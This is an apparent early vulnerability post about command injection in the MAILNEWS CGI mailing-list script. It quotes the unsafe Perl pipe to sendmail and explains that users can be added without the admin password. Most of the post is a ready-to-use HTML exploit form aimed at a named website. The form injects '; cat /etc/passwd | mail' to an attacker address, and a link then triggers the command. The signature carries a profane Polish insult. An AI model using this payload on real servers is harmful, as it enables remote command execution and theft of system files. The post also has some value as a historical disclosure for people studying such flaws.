Hello BuGReaders... ##Script: mailnews.cgi ##Introduction: <cat from source> CGI-Script MAILNEWS 1.3 This script helps you to maintain a mailinglist. </cat> ##Tested Version: 1.1, 1.3 Author dont parse some characters and he use very stupid "password protection". We can add or delete users from maillist without known admin password. But this is small problem ;] . Lets see what we can do more. <cat source> open (MAIL, "|$mailprog $member") || die "Can't open $mailprog!\n"; </cat> where $mailprog [default] is sendmail and $member is users from usersfile. Now we can do something like this. Add user "; cat /etc/passwd | mail [EMAIL PROTECTED]' and use subroutine to execute this code :] Simple exploit in html: <HTML> <BODY> <FORM ACTION="http://www.adamalysz.com/cgi-bin/mailnews.cgi" METHOD=POST> <INPUT type=hidden NAME="action" value="subscribe"> <BR> User to add with ; [ex:" ; cat /etc/passwd |mail [EMAIL PROTECTED]" without qoutas ofcoz ]<INPUT NAME="address" TYPE="TEXT"> <INPUT TYPE="SUBMIT" VALUE="Submit"> </FORM> <BR> <A HREF="http://www.adamalysz.com./cgi-bin/mailnews.cgi?news"> Execute command :] </A> <CENTER> Peace... </CENTER> </BODY> </HTML> Who : Kanedaaa [EMAIL PROTECTED] ***$$$### " I moze bardzo wielu nie zrozumie tych slow... Ale nie ma litosci dla SKURWYSYNOW .... " ###$$* [EMAIL PROTECTED] Bohater ... Szef ... Abuser ... Cucumber Team Member... Bzz..